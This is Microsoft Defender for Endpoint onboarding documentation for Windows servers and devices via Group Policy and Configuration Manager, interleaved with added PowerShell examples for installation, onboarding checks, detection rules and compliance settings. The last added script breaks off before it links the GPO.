1. Create a group policy: Open the Group Policy Management Console (GPMC), right-click Group Policy
Objects you want to configure and select New. Enter the name of the new GPO in
the dialogue box that is displayed and select OK.

2. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and select Edit.

3. In the Group Policy Management Editor, go to Computer configuration, then
Preferences, and then Control panel settings.

4. Right-click Scheduled tasks, point to New, and then click Immediate Task (At least
Windows 7).

5. In the Task window that opens, go to the General tab. Under Security options
select Change User or Group and type SYSTEM and then select Check Names then
OK. NT AUTHORITY\SYSTEM appears as the user account the task will run as.

6. Select Run whether user is logged on or not and check the Run with highest
privileges check box.

7. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).

8. Go to the Actions tab and select New... Ensure that Start a program is selected in
the Action field. The installer script handles the installation and immediately
performs the onboarding step after installation completes. Select
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe then provide the
arguments:

PowerShell

-ExecutionPolicy RemoteSigned \\servername-or-dfs-space\share-name\install.ps1 -OnboardingScript \\servername-or-dfs-space\share-name\windowsdefenderatponboardingscript.cmd

Note

The recommended execution policy setting is AllSigned. This requires
importing the script's signing certificate into the Local Computer Trusted
Publishers store if the script is running as SYSTEM on the endpoint.

Replace \\servername-or-dfs-space\share-name with the UNC path, using the file
server's fully qualified domain name (FQDN), of the shared install.ps1 file. The
installer package md4ws.msi must be placed in the same directory. Ensure that the
permissions of the UNC path allow write access to the computer account that is
installing the package, to support creation of log files. If you wish to disable the
creation of log files (not recommended), you can use the -noETL -noMSILog
parameters.

For scenarios where you want Microsoft Defender Antivirus to co-exist with non-
Microsoft antimalware solutions, add the $Passive parameter to set passive mode
during installation.

9. Select OK and close any open GPMC windows.

10. To link the GPO to an Organization Unit (OU), right-click and select Link an
existing GPO. In the dialogue box that is displayed, select the Group Policy Object
that you wish to link. Select OK.
For more configuration settings, see Configure sample collection settings and Other
recommended configuration settings.

STEP 3: Complete the onboarding steps


The following steps are only applicable if you're using a third-party anti-malware
solution. You'll need to apply the following Microsoft Defender Antivirus passive mode
setting. Verify that it was configured correctly:

1. Set the following registry entry:

Path: HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection
Name: ForceDefenderPassiveMode
Type: REG_DWORD
Value: 1
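The command-line installation described earlier and the passive-mode registry entry in STEP 3 are usually scripted together when a non-Microsoft antivirus product stays the primary engine. The following is an added example, not the article's own script and not Microsoft's install.ps1: it runs the same Msiexec /i md4ws.msi /quiet install from the article, adds the optional FORCEPASSIVEMODE=1 property when asked to, checks the msiexec exit code, and then writes ForceDefenderPassiveMode = 1 so Defender Antivirus stays passive after onboarding. The -ThirdPartyAv switch, the log file location, and the refusal to run while the Sense service is already running (the article notes the installer asks for offboarding first in that case) are this example's own choices. Run it from an elevated PowerShell prompt with md4ws.msi in the current directory.

```powershell
# Added example (not from the Microsoft article): unified-package install on
# Windows Server 2012 R2 / 2016 with optional passive mode for Defender AV.
# Assumptions: md4ws.msi is in the current directory unless -MsiPath is given;
# -ThirdPartyAv and the log path are this example's own conventions.
[CmdletBinding()]
param(
    [string]$MsiPath = '.\md4ws.msi',
    [switch]$ThirdPartyAv
)

$ErrorActionPreference = 'Stop'

if (-not (Test-Path -LiteralPath $MsiPath)) {
    throw "Installer package not found: $MsiPath"
}
$MsiPath = (Resolve-Path -LiteralPath $MsiPath).Path

# The article warns that re-running the installer on an onboarded machine
# prompts for offboarding first, so stop here rather than half-install.
$sense = Get-Service -Name Sense -ErrorAction SilentlyContinue
if ($sense -and $sense.Status -eq 'Running') {
    throw 'The Sense (EDR) service is already running; offboard before reinstalling.'
}

$logPath = Join-Path $env:TEMP 'md4ws-install.log'
# /quiet is the switch from the article; /norestart and /l*v are standard
# msiexec switches added here so the run is unattended and leaves a log.
$msiArgs = @('/i', "`"$MsiPath`"", '/quiet', '/norestart', '/l*v', "`"$logPath`"")
if ($ThirdPartyAv) {
    # Optional property named in the article: sets Defender AV to passive
    # mode at install time so it does not compete with the primary AV product.
    $msiArgs += 'FORCEPASSIVEMODE=1'
}

$proc = Start-Process -FilePath 'msiexec.exe' -ArgumentList $msiArgs -Wait -PassThru
switch ($proc.ExitCode) {
    0       { Write-Host "Installed successfully (log: $logPath)" }
    3010    { Write-Warning "Installed; a restart is required (log: $logPath)" }
    default { throw "msiexec failed with exit code $($proc.ExitCode); see $logPath" }
}

if ($ThirdPartyAv) {
    # STEP 3 of the article: keep Defender AV passive after onboarding.
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
    if (-not (Test-Path -LiteralPath $policyKey)) {
        New-Item -Path $policyKey -Force | Out-Null
    }
    New-ItemProperty -Path $policyKey -Name 'ForceDefenderPassiveMode' `
        -PropertyType DWord -Value 1 -Force | Out-Null

    # Re-read the value instead of trusting the write.
    $value = (Get-ItemProperty -LiteralPath $policyKey).ForceDefenderPassiveMode
    if ($value -ne 1) { throw 'ForceDefenderPassiveMode was not set to 1.' }
    Write-Host 'ForceDefenderPassiveMode = 1 configured.'
}
```

Without -ThirdPartyAv the script performs a plain install and leaves Defender Antivirus active, which matches the article's note that the product does not enter passive mode on its own. Exit code 3010 is msiexec's "success, reboot required" code, so it is reported as a warning rather than a failure.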

Known issues and limitations in the new, unified solution package for Windows Server 2012 R2 and 2016

Important

Always download the latest installer package from the Microsoft Defender portal
(https://security.microsoft.com) before performing a new installation and ensure
prerequisites have been met. After installation, ensure to regularly update using
component updates described in the section Update packages for Microsoft
Defender for Endpoint on Windows Server 2012 R2 and 2016.

An operating system update can introduce an installation issue on machines with
slower disks due to a timeout with service installation. Installation fails with the
message "Could not find c:\program files\windows defender\mpasdesc.dll, - 310
WinDefend". Use the latest installation package, and the latest install.ps1 script
to help clear the failed installation if necessary.

We've identified an issue with Windows Server 2012 R2 connectivity to cloud when
static TelemetryProxyServer is used and the certificate revocation list (CRL) URLs
aren't reachable from the SYSTEM account context. Ensure the EDR sensor is
updated to version 10.8210.* or later (using KB5005292) to resolve the issue.
Alternatively, use a different proxy option ("system-wide") that provides such
connectivity, or configure the same proxy via the WinInet setting on the SYSTEM
account context.

On Windows Server 2012 R2, there's no user interface for Microsoft Defender
Antivirus. In addition, the user interface on Windows Server 2016 only allows for
basic operations. To perform operations on a device locally, refer to Manage
Microsoft Defender for Endpoint with PowerShell, WMI, and MPCmdRun.exe. As a
result, features that specifically rely on user interaction, such as where the user is
prompted to make a decision or perform a specific task, may not work as expected.
It's recommended not to enable the user interface or require user interaction on
any managed server, as doing so may impact protection capability.

Not all Attack Surface Reduction rules are applicable to all operating systems. See
Attack surface reduction rules.

Operating system upgrades aren't supported. Offboard then uninstall before
upgrading. The installer package can only be used to upgrade installations that
have not yet been updated with new antimalware platform or EDR sensor update
packages.

Automatic exclusions for server roles aren't supported on Windows Server 2012
R2; however, built-in exclusions for operating system files are. For more
information about adding exclusions, see Configure Microsoft Defender Antivirus
exclusions on Windows Server.

To automatically deploy and onboard the new solution using Microsoft Endpoint
Configuration Manager (MECM) you need to be on version 2207 or later. You can
still configure and deploy using version 2107 with the hotfix rollup, but this
requires additional deployment steps. See Microsoft Endpoint Configuration
Manager migration scenarios for more information.

Windows Server Semi-Annual Enterprise Channel (SAC), Windows Server 2019 and Windows Server 2022

Download package
1. In Microsoft Defender XDR, go to Settings > Endpoints > Device Management >
Onboarding.

2. Select Windows Server 1803 and 2019.

3. Select Download package. Save it as WindowsDefenderATPOnboardingPackage.zip.
4. Follow the steps provided in the Complete the onboarding steps section.

Verify the onboarding and installation


Verify that Microsoft Defender Antivirus and Microsoft Defender for Endpoint are
running.

Run a detection test to verify onboarding


After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Note

Running Microsoft Defender Antivirus is not required but it is recommended. If
another antivirus vendor product is the primary endpoint protection solution, you
can run Defender Antivirus in Passive mode. You can only confirm that passive
mode is on after verifying that Microsoft Defender for Endpoint sensor (SENSE) is
running.

1. Run the following command to verify that Microsoft Defender Antivirus is installed:

Note

This verification step is only required if you're using Microsoft Defender
Antivirus as your active antimalware solution.

Windows Command Prompt

sc.exe query Windefend

If the result is 'The specified service doesn't exist as an installed service', then you'll
need to install Microsoft Defender Antivirus.

For information on how to use Group Policy to configure and manage Microsoft
Defender Antivirus on your Windows servers, see Use Group Policy settings to
configure and manage Microsoft Defender Antivirus.
2. Run the following command to verify that Microsoft Defender for Endpoint is
running:

Windows Command Prompt

sc.exe query sense

The result should show it's running. If you encounter issues with onboarding, see
Troubleshoot onboarding.
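The two sc.exe queries above answer the question for one server at an interactive prompt. When the same check has to run across a fleet or from a deployment tool, it helps to return one structured result instead of reading console text. The following is an added example, not part of the Microsoft article: it reads the same two services (WinDefend for Microsoft Defender Antivirus, Sense for the Defender for Endpoint sensor) with Get-Service, adds the Defender Antivirus running mode from Get-MpComputerStatus (whose AMRunningMode property reports values such as Normal or Passive Mode), and returns a single object. The function name and property names are this example's own.

```powershell
# Added example (not from the Microsoft article): structured onboarding check
# equivalent to "sc.exe query Windefend" and "sc.exe query sense".
# Function and output property names are this example's own conventions.
function Test-MdeOnboarding {
    [CmdletBinding()]
    param()

    # Get-Service returns nothing for a service that is not installed, which
    # for WinDefend is the "specified service does not exist" case the
    # article describes (Defender AV still has to be installed).
    $av    = Get-Service -Name WinDefend -ErrorAction SilentlyContinue
    $sense = Get-Service -Name Sense     -ErrorAction SilentlyContinue

    # AMRunningMode is only available where the Defender AV module is
    # present, so failures here are treated as "unknown", not as errors.
    $runningMode = $null
    try {
        $runningMode = (Get-MpComputerStatus -ErrorAction Stop).AMRunningMode
    } catch { }

    [pscustomobject]@{
        ComputerName        = $env:COMPUTERNAME
        DefenderAvInstalled = [bool]$av
        DefenderAvRunning   = [bool]($av -and $av.Status -eq 'Running')
        DefenderAvMode      = $runningMode
        SenseInstalled      = [bool]$sense
        SenseRunning        = [bool]($sense -and $sense.Status -eq 'Running')
    }
}

$result = Test-MdeOnboarding
$result | Format-List

# The article's success condition is that the Sense service is running;
# a non-zero exit code lets a deployment tool flag the device for follow-up.
if (-not $result.SenseRunning) {
    Write-Warning 'Sense is not running; see Troubleshoot onboarding.'
    exit 1
}
```

As the note above says, passive mode can only be confirmed once Sense is running, so read DefenderAvMode only on devices where SenseRunning is true.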

Run a detection test


Follow the steps in Run a detection test on a newly onboarded device to verify that the
server is reporting to Defender for the Endpoint service.

Next steps
After successfully onboarding devices to the service, you'll need to configure the
individual components of Microsoft Defender for Endpoint. Follow Configure capabilities
to be guided on enabling the various components.

Offboard Windows servers


You can offboard Windows Server 2012 R2, Windows Server 2016, Windows Server
(SAC), Windows Server 2019, and Windows Server 2019 Core edition in the same
method available for Windows 10 client devices.

Offboard devices using Group Policy


Offboard devices using Configuration Manager
Offboard devices using Mobile Device Management tools
Offboard devices using a local script

After offboarding, you can proceed to uninstall the unified solution package on
Windows Server 2012 R2 and Windows Server 2016.

For other Windows server versions, you have two options to offboard Windows servers
from the service:

Uninstall the MMA agent


Remove the Defender for Endpoint workspace configuration

Note

These offboarding instructions for other Windows server versions also apply if you
are running the previous Microsoft Defender for Endpoint for Windows Server 2016
and Windows Server 2012 R2 that requires the MMA. Instructions to migrate to the
new unified solution are at Server migration scenarios in Microsoft Defender for
Endpoint.

Related articles
Onboard previous versions of Windows
Onboard Windows 10 devices
Onboard non-Windows devices
Configure proxy and Internet connectivity settings
Run a detection test on a newly onboarded Defender for Endpoint device
Troubleshooting Microsoft Defender for Endpoint onboarding issues
Microsoft Entra seamless single sign-on
Troubleshoot onboarding issues related to Security Management for Microsoft
Defender for Endpoint

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboard Windows devices using
Configuration Manager
Article • 12/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Configuration Manager current branch
System Center 2012 R2 Configuration Manager

Want to experience Defender for Endpoint? Sign up for a free trial.

Prerequisites
Endpoint Protection point site system role

Important

The Endpoint Protection point site system role is required so that antivirus and
attack surface reduction policies are properly deployed to the targeted endpoints.
Without this role, the endpoints in the device collection won't receive the
configured antivirus and attack surface reduction policies.

You can use Configuration Manager to onboard endpoints to the Microsoft Defender for
Endpoint service.

There are several options you can use to onboard devices using Configuration Manager:

Onboard devices using System Center Configuration Manager
Tenant attach

For Windows Server 2012 R2 and Windows Server 2016 - after completing the
onboarding steps, you'll need to Configure and update System Center Endpoint
Protection clients.

Note

Defender for Endpoint doesn't support onboarding during the Out-Of-Box
Experience (OOBE) phase. Make sure users complete OOBE after running Windows
installation or upgrading.

Note that it's possible to create a detection rule on a Configuration Manager
application to continuously check if a device has been onboarded. An application is
a different type of object than a package and program. If a device is not yet
onboarded (due to pending OOBE completion or any other reason), Configuration
Manager will retry to onboard the device until the rule detects the status change.

This behavior can be accomplished by creating a detection rule checking if the
"OnboardingState" registry value (of type REG_DWORD) = 1. This registry value is
located under "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat
Protection\Status". For more information, see Configure Detection Methods in
System Center 2012 R2 Configuration Manager.
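A Configuration Manager application can use a registry-based detection rule for this directly; the script form below is an added example, not from the Microsoft article, and is useful when the rule needs to be reviewed in version control or extended later. It follows Configuration Manager's script-detection convention, which is not stated in the article but is how PowerShell detection scripts are evaluated: exit code 0 together with any text on STDOUT means "installed", exit code 0 with no output means "not installed". Only the registry path and the OnboardingState = 1 condition from the note above are used.

```powershell
# Added example (not from the Microsoft article): PowerShell detection script
# for a Configuration Manager application deployment type that deploys the
# onboarding package. "Installed" = exit 0 plus STDOUT output; "not installed"
# = exit 0 with no output, which makes the client keep retrying the deployment
# until the OnboardingState value flips to 1 (for example after OOBE finishes).
$statusKey = 'HKLM:\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status'

$state = $null
if (Test-Path -LiteralPath $statusKey) {
    # OnboardingState is a REG_DWORD; it is absent until onboarding completes.
    $state = (Get-ItemProperty -LiteralPath $statusKey -ErrorAction SilentlyContinue).OnboardingState
}

if ($state -eq 1) {
    # Detected: write something to STDOUT and exit 0.
    Write-Output "Defender for Endpoint onboarded (OnboardingState = $state)"
    exit 0
}

# Not detected: write nothing to STDOUT and still exit 0. A non-zero exit
# code is not read by Configuration Manager as a clean "not installed", so it
# is avoided deliberately; diagnostic text goes to the verbose stream only.
Write-Verbose "OnboardingState is '$state'; device not onboarded yet."
exit 0
```

Keep any troubleshooting output out of STDOUT in the "not detected" branch; a stray Write-Output there would make every device look onboarded.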

Configure sample collection settings


For each device, you can set a configuration value to state whether samples can be
collected from the device when a request is made through Microsoft Defender XDR to
submit a file for deep analysis.

7 Note

These configuration settings are typically done through Configuration Manager.

You can set a compliance rule for configuration item in Configuration Manager to
change the sample share setting on a device.

This rule should be a remediating compliance rule configuration item that sets the value
of a registry key on targeted devices to make sure they're compliant.

The configuration is set through the following registry key entry:

text

Path: "HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection"
Name: "AllowSampleCollection"
Value: 0 or 1

The key type is a DWORD. Possible values are:

0: Doesn't allow sample sharing from this device
1: Allows sharing of all file types from this device

The default value in case the registry key doesn't exist is 1.

For more information about System Center Configuration Manager Compliance, see
Introduction to compliance settings in System Center 2012 R2 Configuration Manager.
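Configuration Manager can enforce this value with a native registry-value setting in a configuration item, and the article's remediating compliance rule can be built that way. The following is an added example, not from the Microsoft article, showing the equivalent as a script-type setting, which makes the default-handling rule explicit: a discovery script that reports the effective AllowSampleCollection value (treating a missing value as the article's default of 1), and a remediation script that writes the desired REG_DWORD. The two scripts are pasted into the Discovery script and Remediation script boxes of the setting separately; $DesiredValue is this example's own name.

```powershell
# Added example (not from the Microsoft article): script-type setting for a
# remediating compliance rule on AllowSampleCollection. The compliance rule
# compares the discovery script's output with the expected value ("1" or "0")
# and runs the remediation script when they differ.

# ---------- Discovery script (paste into the "Discovery script" box) ----------
$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$current = $null
if (Test-Path -LiteralPath $policyKey) {
    $current = (Get-ItemProperty -LiteralPath $policyKey -ErrorAction SilentlyContinue).AllowSampleCollection
}
# The article states the default is 1 when the value does not exist, so report
# the effective setting rather than "missing"; the rule then only fires when an
# explicit, different value is present.
if ($null -eq $current) { $current = 1 }
Write-Output ([string]$current)

# ---------- Remediation script (paste into the "Remediation script" box) ----------
$policyKey    = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection'
$DesiredValue = 1   # 0 = no sample sharing from this device, 1 = allow all file types
if (-not (Test-Path -LiteralPath $policyKey)) {
    New-Item -Path $policyKey -Force | Out-Null
}
# REG_DWORD as the article specifies; -Force overwrites an existing value.
New-ItemProperty -Path $policyKey -Name 'AllowSampleCollection' `
    -PropertyType DWord -Value $DesiredValue -Force | Out-Null
# Re-read so the remediation reports its real outcome, not just the write.
$after = (Get-ItemProperty -LiteralPath $policyKey).AllowSampleCollection
if ($after -ne $DesiredValue) {
    throw "AllowSampleCollection is '$after', expected $DesiredValue"
}
```

Set $DesiredValue and the rule's expected value together: with both at 0, devices that rely on the implicit default of 1 are reported non-compliant and remediated to an explicit 0. The same discovery pattern, minus the remediation script, is what the non-remediating monitoring rule later in this article needs for OnboardingState.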

Onboard Windows devices using Microsoft Configuration Manager

Collection creation
To onboard Windows devices with Microsoft Configuration Manager, the deployment
can target an existing collection or a new collection can be created for testing.

Onboarding using tools such as Group Policy or a manual method doesn't install any
agents on the system.

Within the Microsoft Configuration Manager console, the onboarding process will be
configured as part of the compliance settings within the console.

Any system that receives this required configuration maintains that configuration for as
long as the Configuration Manager client continues to receive this policy from the
management point.

Follow these steps to onboard endpoints using Microsoft Configuration Manager:

1. In the Microsoft Configuration Manager console, navigate to Assets and
Compliance > Overview > Device Collections.

2. Select and hold (or right-click) Device Collection and select Create Device
Collection.

3. Provide a Name and Limiting Collection, then select Next.

4. Select Add Rule and choose Query Rule.

5. Select Next on the Direct Membership Wizard and then select Edit Query
Statement.

6. Select Criteria and then choose the star icon.

7. Keep the criterion type as Simple value, set Where to Operating System - build
number, set Operator to is greater than or equal to and Value to 14393, and select OK.

8. Select Next and Close.

9. Select Next.

After completing this task you have a device collection with all the Windows endpoints
in the environment.

Other recommended configuration settings


After onboarding devices to the service, it's important to take advantage of the included
threat protection capabilities by enabling them with the following recommended
configuration settings.

Device collection configuration


If you're using Configuration Manager, version 2002 or later, you can choose to broaden
the deployment to include servers or down-level clients.

Next generation protection configuration


The following configuration settings are recommended:

Scan
Scan removable storage devices such as USB drives: Yes

Real-time Protection
Enable Behavioral Monitoring: Yes
Enable protection against Potentially Unwanted Applications at download and
prior to installation: Yes

Cloud Protection Service


Cloud Protection Service membership type: Advanced membership

Attack surface reduction


Configure all available rules to Audit.

Note

Blocking these activities may interrupt legitimate business processes. The best
approach is setting everything to audit, identifying which ones are safe to turn on,
and then enabling those settings on endpoints which do not have false positive
detections.

To deploy Microsoft Defender Antivirus and attack surface reduction policies
through Microsoft Configuration Manager (SCCM), follow these steps:

Enable Endpoint Protection and configure custom client settings.
Install the Endpoint Protection client from a command prompt.
Verify the Endpoint Protection client installation.

Enable Endpoint Protection and configure custom client settings

Follow the steps to enable endpoint protection and configuration of custom client
settings:

1. In the Configuration Manager console, click Administration.

2. In the Administration workspace, click Client Settings.

3. On the Home tab, in the Create group, click Create Custom Client Device Settings.

4. In the Create Custom Client Device Settings dialog box, provide a name and a
description for the group of settings, and then select Endpoint Protection.

5. Configure the Endpoint Protection client settings that you require. For a full list of
Endpoint Protection client settings that you can configure, see the Endpoint
Protection section in About client settings.

) Important

Install the Endpoint Protection site system role before you configure client
settings for Endpoint Protection.

6. Click OK to close the Create Custom Client Device Settings dialog box. The new
client settings are displayed in the Client Settings node of the Administration
workspace.

7. Next, deploy the custom client settings to a collection. Select the custom client
settings you want to deploy. In the Home tab, in the Client Settings group, click
Deploy.

8. In the Select Collection dialog box, choose the collection to which you want to
deploy the client settings and then click OK. The new deployment is shown in the
Deployments tab of the details pane.

Clients are configured with these settings when they next download client policy. For
more information, see Initiate policy retrieval for a Configuration Manager client.

Installation of Endpoint Protection client from a command prompt

Follow the steps to complete installation of endpoint protection client from the
command prompt.

1. Copy scepinstall.exe from the Client folder of the Configuration Manager
installation folder to the computer on which you want to install the Endpoint
Protection client software.

2. Open a command prompt as an administrator. Change directory to the folder with
the installer. Then run scepinstall.exe, adding any extra command-line properties
that you require:

Property    Description

/s          Run the installer silently
/q          Extract the setup files silently
/i          Run the installer normally
/policy     Specify an antimalware policy file to configure the client during installation
/sqmoptin   Opt-in to the Microsoft Customer Experience Improvement Program (CEIP)

3. Follow the on-screen instructions to complete the client installation.

4. If you downloaded the latest update definition package, copy the package to the
client computer, and then double-click the definition package to install it.

Note

After the Endpoint Protection client install completes, the client automatically
performs a definition update check. If this update check succeeds, you don't
have to manually install the latest definition update package.

Example: install the client with an antimalware policy

scepinstall.exe /policy <full path>\<policy file>

Verify the Endpoint Protection client installation

After you install the Endpoint Protection client on your reference computer, verify that
the client is working correctly.

1. On the reference computer, open System Center Endpoint Protection from the
Windows notification area.
2. On the Home tab of the System Center Endpoint Protection dialog box, verify that
Real-time protection is set to On.
3. Verify that up to date is displayed for Virus and spyware definitions.
4. To make sure that your reference computer is ready for imaging, under Scan
options, select Full, and then click Scan now.

Network protection
Prior to enabling network protection in audit or block mode, ensure that you've installed
the antimalware platform update, which can be obtained from the support page.

Controlled folder access


Enable the feature in audit mode for at least 30 days. After this period, review detections
and create a list of applications that are allowed to write to protected directories.

For more information, see Evaluate controlled folder access.

Run a detection test to verify onboarding


After onboarding the device, you can choose to run a detection test to verify that a
device is properly onboarded to the service. For more information, see Run a detection
test on a newly onboarded Microsoft Defender for Endpoint device.

Offboard devices using Configuration Manager


For security reasons, the package used to Offboard devices will expire 30 days after the
date it was downloaded. Expired offboarding packages sent to a device will be rejected.
When downloading an offboarding package, you will be notified of the packages expiry
date and it will also be included in the package name.

Note

Onboarding and offboarding policies must not be deployed on the same device at
the same time, otherwise this will cause unpredictable collisions.

Offboard devices using Microsoft Configuration Manager current branch

If you use Microsoft Configuration Manager current branch, see Create an offboarding
configuration file.

Offboard devices using System Center 2012 R2 Configuration Manager

1. Get the offboarding package from Microsoft Defender portal:
a. In the navigation pane, select Settings > Endpoints > Device management >
Offboarding.
b. Select Windows 10 or Windows 11 as the operating system.
c. In the Deployment method field, select System Center Configuration Manager
2012/2012 R2/1511/1602.
d. Select Download package, and save the .zip file.
2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the network administrators who will deploy the package. You should
have a file named WindowsDefenderATPOffboardingScript_valid_until_YYYY-MM-
DD.cmd.

3. Deploy the package by following the steps in the Packages and Programs in
System Center 2012 R2 Configuration Manager article.

Choose a predefined device collection to deploy the package to.

Important

Offboarding causes the device to stop sending sensor data to the portal but data
from the device, including reference to any alerts it has had will be retained for up
to 6 months.

Monitor device configuration


If you're using Microsoft Configuration Manager current branch, use the built-in
Defender for Endpoint dashboard in the Configuration Manager console. For more
information, see Defender for Endpoint - Monitor.

If you're using System Center 2012 R2 Configuration Manager, monitoring consists of
two parts:

1. Confirming the configuration package has been correctly deployed and is running
(or has successfully run) on the devices in your network.

2. Checking that the devices are compliant with the Defender for Endpoint service
(this ensures the device can complete the onboarding process and can continue to
report data to the service).

Confirm the configuration package has been correctly deployed

1. In the Configuration Manager console, click Monitoring at the bottom of the
navigation pane.

2. Select Overview and then Deployments.

3. Select the deployment with the package name.

4. Review the status indicators under Completion Statistics and Content Status.

If there are failed deployments (devices with Error, Requirements Not Met, or
Failed statuses), you may need to troubleshoot the devices. For more information,
see, Troubleshoot Microsoft Defender for Endpoint onboarding issues.

Check that the devices are compliant with the Microsoft Defender for Endpoint service

You can set a compliance rule for configuration item in System Center 2012 R2
Configuration Manager to monitor your deployment.

This rule should be a non-remediating compliance rule configuration item that monitors
the value of a registry key on targeted devices.

Monitor the following registry key entry:

Console

Path: "HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status"
Name: "OnboardingState"
Value: "1"

For more information, see Introduction to compliance settings in System Center 2012 R2
Configuration Manager.
Related topics
Onboard Windows devices using Group Policy
Onboard Windows devices using Mobile Device Management tools
Onboard Windows devices using a local script
Onboard non-persistent virtual desktop infrastructure (VDI) devices
Run a detection test on a newly onboarded Microsoft Defender for Endpoint
device
Troubleshoot Microsoft Defender for Endpoint onboarding issues

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community.


Onboard Windows devices using Group
Policy
Article • 09/15/2023

Important

Some information in this article relates to prereleased product which may be
substantially modified before it's commercially released. Microsoft makes no
warranties, express or implied, with respect to the information provided here.

Applies to:

Group Policy
Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Note

To use Group Policy (GP) updates to deploy the package, you must be on Windows
Server 2008 R2 or later.

For Windows Server 2019 and Windows Server 2022, you may need to replace NT
AUTHORITY\Well-Known-System-Account with NT AUTHORITY\SYSTEM of the XML
file that the Group Policy preference creates.

Note

If you're using the new, unified Microsoft Defender for Endpoint solution for
Windows Server 2012 R2 and 2016, please ensure you are using the latest ADMX
files in your central store to get access to the correct Microsoft Defender for
Endpoint policy options. Please reference How to create and manage the Central
Store for Group Policy Administrative Templates in Windows and download the
latest files for use with Windows 10.
Check out Identify Defender for Endpoint architecture and deployment method to see
the various paths in deploying Defender for Endpoint.

1. Open the GP configuration package file (WindowsDefenderATPOnboardingPackage.zip)
that you downloaded from the service onboarding wizard. You can also get the
package from the Microsoft Defender portal:

a. In the navigation pane, select Settings > Endpoints > Device management >
Onboarding.

b. Select the operating system.

c. In the Deployment method field, select Group policy.

d. Click Download package and save the .zip file.

2. Extract the contents of the .zip file to a shared, read-only location that can be
accessed by the device. You should have a folder called OptionalParamsPolicy and
the file WindowsDefenderATPOnboardingScript.cmd.

3. To create a new GPO, open the Group Policy Management Console (GPMC), right-
click Group Policy Objects you want to configure and click New. Enter the name of
the new GPO in the dialogue box that is displayed and click OK.

4. Open the Group Policy Management Console (GPMC), right-click the Group Policy
Object (GPO) you want to configure and click Edit.

5. In the Group Policy Management Editor, go to Computer configuration, then
Preferences, and then Control panel settings.

6. Right-click Scheduled tasks, point to New, and then click Immediate Task (At least
Windows 7).

7. In the Task window that opens, go to the General tab. Under Security options click
Change User or Group and type SYSTEM and then click Check Names then OK. NT
AUTHORITY\SYSTEM appears as the user account the task will run as.

8. Select Run whether user is logged on or not and check the Run with highest
privileges check box.

9. In the Name field, type an appropriate name for the scheduled task (for example,
Defender for Endpoint Deployment).

10. Go to the Actions tab and select New... Ensure that Start a program is selected in
the Action field. Enter the UNC path, using the file server's fully qualified domain
name (FQDN), of the shared WindowsDefenderATPOnboardingScript.cmd file.

11. Select OK and close any open GPMC windows.

12. To link the GPO to an Organization Unit (OU), right-click and select Link an
existing GPO. In the dialogue box that is displayed, select the Group Policy Object
that you wish to link. Click OK.
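The procedure above can be partly scripted. The PowerShell below is added here as an example and is not part of the original article or the product: it extracts the package onto a read-only share, locks the folder's NTFS permissions so that domain computers can only read what SYSTEM will later execute, records the script hash, and creates and links the GPO with the GroupPolicy module. The file-server name, share path, GPO name and OU are placeholders. The Immediate Task preference has no PowerShell cmdlet, so that step still happens in GPMC as described in steps 5 to 11.

```powershell
# Added example: stage the onboarding package and create/link the GPO.
# Assumptions: placeholder share, domain and OU names; run from a domain-joined
# admin workstation with the GroupPolicy module (RSAT) installed.
#Requires -Modules GroupPolicy

param(
    [string]$PackageZip = "$env:USERPROFILE\Downloads\WindowsDefenderATPOnboardingPackage.zip",
    # Use the file server's FQDN in the UNC path, as the article recommends.
    [string]$ShareRoot  = '\\fs01.corp.example.com\MDEOnboarding',
    [string]$GpoName    = 'MDE Onboarding',
    [string]$TargetOu   = 'OU=Workstations,DC=corp,DC=example,DC=com'
)

Import-Module GroupPolicy

# 1. Extract the package into the share (-Force overwrites an earlier copy).
Expand-Archive -LiteralPath $PackageZip -DestinationPath $ShareRoot -Force
$script = Join-Path $ShareRoot 'WindowsDefenderATPOnboardingScript.cmd'
if (-not (Test-Path -LiteralPath $script)) {
    throw "Expected $script after extraction; check the package contents."
}

# 2. Lock down NTFS permissions. Every linked device runs this file as SYSTEM,
#    so anything that can write to the share can run code as SYSTEM on all of them.
#    Domain Computers get read/execute only; administration stays with Domain Admins.
$acl = Get-Acl -LiteralPath $ShareRoot
$acl.SetAccessRuleProtection($true, $false)      # break inheritance, drop inherited ACEs
$inherit = [System.Security.AccessControl.InheritanceFlags]'ContainerInherit, ObjectInherit'
foreach ($entry in @(
        @{ Identity = 'Domain Computers'; Rights = 'ReadAndExecute' },
        @{ Identity = 'Domain Admins';    Rights = 'FullControl' })) {
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        $entry.Identity, $entry.Rights, $inherit, 'None', 'Allow')
    $acl.AddAccessRule($rule)
}
Set-Acl -LiteralPath $ShareRoot -AclObject $acl

# 3. Record the script hash; compare it later to notice tampering on the share.
$hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $script).Hash
Write-Host "Staged $script"
Write-Host "SHA256 $hash"

# 4. Create the GPO (idempotently) and link it to the OU.
try   { $gpo = Get-GPO -Name $GpoName -ErrorAction Stop }
catch { $gpo = New-GPO -Name $GpoName -Comment "Immediate Task runs $script as SYSTEM" }

$linked = (Get-GPInheritance -Target $TargetOu).GpoLinks | Where-Object { $_.GpoId -eq $gpo.Id }
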